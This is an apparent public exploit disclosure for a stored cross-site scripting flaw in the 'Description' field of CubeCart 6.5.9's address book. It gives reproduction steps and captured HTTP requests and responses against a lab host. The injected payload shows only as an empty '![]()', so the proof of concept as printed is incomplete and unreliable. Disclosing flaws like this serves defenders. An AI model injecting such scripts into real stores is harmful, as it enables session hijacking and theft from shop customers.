# Exploit Title: Stored XSS in "Description" Functionality - cubecartv6.5.9
# Date: 05/2025
# Exploit Author: Andrey Stoykov
# Version: 6.5.9
# Tested on: Debian 12
# Blog: https://msecureltd.blogspot.com/
Stored XSS #1:
Steps to Reproduce:
1. Visit "Account" > "Address Book" and choose "Edit"
2. In the "Description" parameter enter the following payload
![]()
// HTTP POST Request
POST /cubecart/index.php?_a=addressbook&action=edit&address_id=1 HTTP/1.1
Host: 192.168.58.186
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:139.0)
Gecko/20100101 Firefox/139.0
[...]
------geckoformboundary6f5a64973a1e97b9d4b5c2a0d79601a6
Content-Disposition: form-data; name="description"
![]()
------geckoformboundary6f5a64973a1e97b9d4b5c2a0d79601a6
Content-Disposition: form-data; name="title"
[...]
// HTTP Response
HTTP/1.1 302 Found
Date: Sun, 18 May 2025 12:16:17 GMT
Server: Apache/2.4.56 (Unix) OpenSSL/1.1.1t PHP/8.2.4 mod_perl/2.0.12
Perl/v5.34.1
X-Frame-Options: SAMEORIGIN
X-Powered-By: PHP/8.2.4
X-Frame-Options: SAMEORIGIN
Expires: Thu, 19 Nov 1981 08:52:00 GMT
[...]
// HTTP GET Request
GET /cubecart/index.php?_a=addressbook HTTP/1.1
Host: 192.168.58.186
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:139.0)
Gecko/20100101 Firefox/139.0
[...]
// HTTP Response
HTTP/1.1 200 OK
Date: Sun, 18 May 2025 12:16:41 GMT
Server: Apache/2.4.56 (Unix) OpenSSL/1.1.1t PHP/8.2.4 mod_perl/2.0.12
Perl/v5.34.1
X-Frame-Options: SAMEORIGIN
X-Powered-By: PHP/8.2.4
X-Frame-Options: SAMEORIGIN
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: CC_1349B74620=k6fd07i7h211fg1d69p5mvkuru;Expires=Monday,
19-May-2025 12:16:41 UTC;Domain=.192.168.58.186;Path=/cubecart;HttpOnly
Vary: Accept-Encoding
Content-Length: 42139
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
[...]
[...]